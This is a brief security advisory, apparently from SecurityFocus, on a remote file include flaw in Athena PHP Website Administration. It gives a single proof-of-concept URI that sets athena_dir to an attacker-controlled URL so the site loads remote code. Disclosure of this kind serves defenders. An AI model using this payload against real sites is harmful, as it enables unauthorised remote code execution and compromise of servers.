Athena PHP Website Administration Remote File Include Vulnerability

An exploit is not required.

The following proof of concept URI is available:
http://www.example.com/path_to_athena/athena.php?athena_dir=http://[attacker_url]


 

Privacy Statement
Copyright 2010, SecurityFocus